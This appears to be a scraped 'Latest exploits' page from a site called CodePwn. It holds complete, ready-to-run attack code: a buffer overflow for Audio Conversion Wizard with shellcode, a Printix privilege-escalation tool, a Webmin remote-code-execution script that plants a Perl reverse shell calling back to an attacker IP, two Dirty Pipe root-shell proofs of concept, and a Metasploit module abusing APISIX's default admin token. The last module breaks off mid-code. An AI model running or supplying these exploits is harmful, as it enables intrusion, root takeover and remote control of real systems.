Latest exploits :: CodePwn

<pre><code># Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.07.2022 # Software Link: https://www.litexmedia.com/acwizard.exe # Tested Version: v2.01 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 push_esp = p32(0x1004dbff) #push esp ret ret from id3lib.dll nops = "\x90" * 15#515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created") </code></pre>

<pre><code># Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation # Date: 3/2/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25090 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090 using System; using System.Runtime.InteropServices; using System.Drawing; using System.Reflection; using System.Threading; using System.IO; using System.Text; using System.Resources; using System.Diagnostics; //Assembly COM for transparent creation of the application. //End of Assembly COM For Transparent Creation usage. public class Program { //Initiator class for the program, the program starts on the main method. public static void Main(string[] args) { //Console.SetWindowSize(120,30); //Console.SetBufferSize(120,30); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ oo dP dP "); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("├ 88 88 "); Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. "); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 "); Console.ForegroundColor = ConsoleColor.Yellow; Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 "); Console.ForegroundColor = ConsoleColor.Magenta; Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' "); Console.WriteLine("├ 88 "); Console.WriteLine("├ dP "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("├ For "); Console.ForegroundColor = ConsoleColor.Magenta; Console.Write("Printix "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("Services Designed By Logan Latvala\n"); Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Thread.Sleep(3000); string filesH = ""; Console.WriteLine("Drag and drop a payload onto this application for execution."); try { if (args[0]?.Length >0) { Console.WriteLine("File Added: " + args[0]); } } catch (Exception e) { Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n"); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(e); Console.ReadLine(); Environment.Exit(40); } Console.WriteLine("\n We're going to look for your printix installer, one moment..."); string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories); double mCheck = 1.00; string trueInstaller = ""; //Starts to enumerate window's installer directory for an author with the name of printix. foreach (string path in installerSearch) { Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length); Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done."); if (readFileProperties(path, "Printix")) { trueInstaller = path; Console.WriteLine("We've found your installer, we'll finish enumeration."); goto MGMA; } mCheck++; } //Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely. MGMA: if (trueInstaller == "") { Console.WriteLine("We can't find your installer, you are not vulnerable."); Thread.Sleep(2000); Environment.Exit(12); } Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ We are starting to enumerate your temporary directory."); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); //Start a new thread here for enumeration. Thread t = new Thread(() => newTempThread(filesH, args)); t.Start(); Process.Start(trueInstaller); Console.WriteLine("All done."); Console.ReadLine(); } public static void newTempThread(string filesH, string[] args) { while (true) { try { //Starts the inheriting process for printix, in which scans for the files and relays their contents. string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories); if (!string.IsNullOrEmpty(files[0])) { foreach (string fl in files) { if (!filesH.Contains(fl)) { //filesH += " " + fl; string[] fileText = File.ReadAllLines(fl); int linerc = 0; foreach (string liners in fileText) { if (liners.Contains("SetupFileName")) { //Most likely the temporary directory for setup, which presents it properly. Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ " + fl); fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\""; Console.WriteLine("├ " + fileText[linerc] + ""); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("│"); filesH += " " + fl; File.WriteAllText(fl, string.Empty); File.WriteAllLines(fl, fileText); } linerc++; } } } } } catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); } Thread.Sleep(20); } } public static bool readFileProperties(string file, string filter) { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.UseShellExecute = false; startInfo.RedirectStandardOutput = true; startInfo.FileName = "CMD.exe"; startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\""; process.StartInfo = startInfo; process.Start(); string output = process.StandardOutput.ReadToEnd(); process.WaitForExit(); if (output.Contains(filter)) { return true; } else { return false; } //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version } } </code></pre>

<pre><code># Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated) # Date: 2022-03-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.webmin.com/ # Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip # Version: <= 1.984 # Tested on: Ubuntu 18 # Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell #!/usr/bin/python3 """ Coded by: @faisalfs10x GitHub: https://github.com/faisalfs10x Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ """ import requests import urllib3 import argparse import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TGREEN = '\033[32m' TRED = '\033[31m' TCYAN = '\033[36m' TSHELL = '\033[32;1m' ENDC = '\033[m' class Exploit(object): def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): self.target = target self.username = username self.password = password self.py3http_server = py3http_server self.pyhttp_port = pyhttp_port self.upload_path = upload_path self.callback_ip = callback_ip self.callback_port = callback_port self.fname = fname #self.proxies = proxies self.s = requests.Session() def gen_payload(self): payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) f = open(f"{self.fname}", "w") f.write(payload) f.close() def login(self): login_url = self.target + "/session_login.cgi" cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } data = { 'user' : self.username, 'pass' : self.password } try: r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) success_message = 'System hostname' if success_message in r.text: print(TGREEN + "[+] Login Successful", ENDC) else: print(TRED +"[-] Login Failed", ENDC) exit() except requests.Timeout as e: print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) exit() def pyhttp_server(self): print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up print('[+] Sleep 3 second to ensure http server is up!') time.sleep(3) # Sleep for 3 seconds to ensure http server is up! def download_remote_url(self): download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": self.target + "/filemin/?xnavigation=1" } data = { 'link': "http://" + self.py3http_server + "/" + self.fname, 'username': '', 'password': '', 'path': self.upload_path } r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") def modify_permission(self): modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" headers = { "Referer": self.target + "/filemin/?xnavigation=1" } data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"[+] Modifying permission of {self.fname} to 0755") def exec_revshell(self): url = self.target + '/' + self.fname try: r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) print("[+] Shell location: " + url) else: print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) def do_cleanup(self): print(TCYAN + '\n[+] Cleaning up ') print(f'[+] Killing: http.server on port {self.pyhttp_port}') os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') exit() def run(self): self.gen_payload() self.login() self.pyhttp_server() self.download_remote_url() self.modify_permission() self.exec_revshell() self.do_cleanup() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() target = args.target username = args.credential.split(':')[0] password = args.credential.split(':')[1] py3http_server = args.py3http_server pyhttp_port = py3http_server.split(':')[1] callback_ip = args.callback_ip callback_port = args.callback_port upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method. fname = "revshell.cgi" # CGI script name, you may change to different name pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run() </code></pre>

<pre><code>// // dirtypipez.c // // hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn // a root shell. (and attempts to restore the damaged binary as well) // // Wow, Dirty CoW reloaded! // // -- blasty <peter@haxx.in> // 2022-03-07 /* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #include <stdint.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif // small (linux x86_64) ELF file matroshka doll that does; // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); // write(fd, elfcode, elfcode_len) // chmod("/tmp/sh", 04755) // close(fd); // exit(0); // // the dropped ELF simply does: // setuid(0); // setgid(0); // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); unsigned char elfcode[] = { /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 }; /** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */ static void prepare_pipe(int p[2]) { if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */ } int hax(char *filename, long offset, uint8_t *data, size_t len) { /* open the input file and validate the specified offset */ const int fd = open(filename, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return -1; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return -1; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return -1; } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return -1; } /* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, len); if (nbytes < 0) { perror("write failed"); return -1; } if ((size_t)nbytes < len) { fprintf(stderr, "short write\n"); return -1; } close(fd); return 0; } int main(int argc, char **argv) { if (argc != 2) { fprintf(stderr, "Usage: %s SUID\n", argv[0]); return EXIT_FAILURE; } char *path = argv[1]; uint8_t *data = elfcode; int fd = open(path, O_RDONLY); uint8_t *orig_bytes = malloc(sizeof(elfcode)); lseek(fd, 1, SEEK_SET); read(fd, orig_bytes, sizeof(elfcode)); close(fd); printf("[+] hijacking suid binary..\n"); if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] dropping suid shell..\n"); system(path); printf("[+] restoring suid binary..\n"); if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); system("/tmp/sh"); return EXIT_SUCCESS; } </code></pre>

<pre><code>/* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif /** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */ static void prepare_pipe(int p[2]) { if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */ } int main(int argc, char **argv) { if (argc != 4) { fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); return EXIT_FAILURE; } /* dumb command-line argument parser */ const char *const path = argv[1]; loff_t offset = strtoul(argv[2], NULL, 0); const char *const data = argv[3]; const size_t data_size = strlen(data); if (offset % PAGE_SIZE == 0) { fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); return EXIT_FAILURE; } const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; const loff_t end_offset = offset + (loff_t)data_size; if (end_offset > next_page) { fprintf(stderr, "Sorry, cannot write across a page boundary\n"); return EXIT_FAILURE; } /* open the input file and validate the specified offset */ const int fd = open(path, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return EXIT_FAILURE; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return EXIT_FAILURE; } if (offset > st.st_size) { fprintf(stderr, "Offset is not inside the file\n"); return EXIT_FAILURE; } if (end_offset > st.st_size) { fprintf(stderr, "Sorry, cannot enlarge the file\n"); return EXIT_FAILURE; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return EXIT_FAILURE; } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return EXIT_FAILURE; } /* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, data_size); if (nbytes < 0) { perror("write failed"); return EXIT_FAILURE; } if ((size_t)nbytes < data_size) { fprintf(stderr, "short write\n"); return EXIT_FAILURE; } printf("It worked!\n"); return EXIT_SUCCESS; } </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'APISIX Admin API default access token RCE', 'Description' => %q{ Apache APISIX has a default, built-in API token edd1c9f034335f136f87ad84b625c8f1 that can be used to access all of the admin API, which leads to remote LUA code execution through the script parameter added in the 2.x version. This module also leverages another vulnerability to bypass the IP restriction plugin. }, 'Author' => [ 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging 'YuanSheng Wang <membphis[at]gmail.com>' # discovered ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-13945'], ['CVE', '2022-24112'], ['URL', 'https://github.com/apache/apisix/pull/2244'], ['URL', 'https://seclists.org/oss-sec/2020/q4/187'], ['URL', 'https://www.openwall.com/lists/oss-security/2022/02/11/3'] ], 'DisclosureDate' => '2020-12-07', 'Arch' => ARCH_CMD, 'Platform' => %w[unix], 'Targets' => [ [ 'Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Privileged' => false, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Path to the APISIX DocumentRoot', '/apisix']), OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1']), OptString.new('ALLOWED_IP', [true, 'IP in the allowed list', '127.0.0.1']) ]) end def check print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") # batch request is the preferred method because it bypass the ip-restriction plugin res = nil if batch_request_enabled? pipeline = [ { method: 'GET', path: "#{target_uri.path}/admin/routes" } ] res = batch_request(batch_body(pipeline)) vprint_good('Can perform authenticated requests through batch requests') if res && res.code == 200 pipeline = [ { method: 'GET', path: "#{target_uri.path}/admin/routes/index" } ] res = batch_request(batch_body(pipeline)) else vprint_error('The batch-requests plugin is not enabled') vprint_good('There is direct access to the routes using the provided token') if direct_access? res = apisix_request({ 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)), 'method' => 'GET' }) end unless res && res.headers.key?('Server') return Exploit::CheckCode::Unknown('Unable to determine which web server is running') end res.headers['Server'].match(%r{(.*)/([\d|.]+)$}) server = Regexp.last_match(1) || nil version = Rex::Version.new(Regexp.last_match(2)) || nil if server && server.match(/APISIX/) vprint_status("Found an #{server} #{version} http server header") return Exploit::CheckCode::Appears if version > Rex::Version.new('2') end return Exploit::CheckCode::Safe('A vulnerable version if APISIX server is not running') end def exploit # batch request is the preferred method because it bypass the ip-restriction plugin if batch_request_enabled? @payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}" filter_func_exec # trigger the payload apisix_request({ 'uri' => normalize_uri(@payload_uri), 'method' => 'GET' 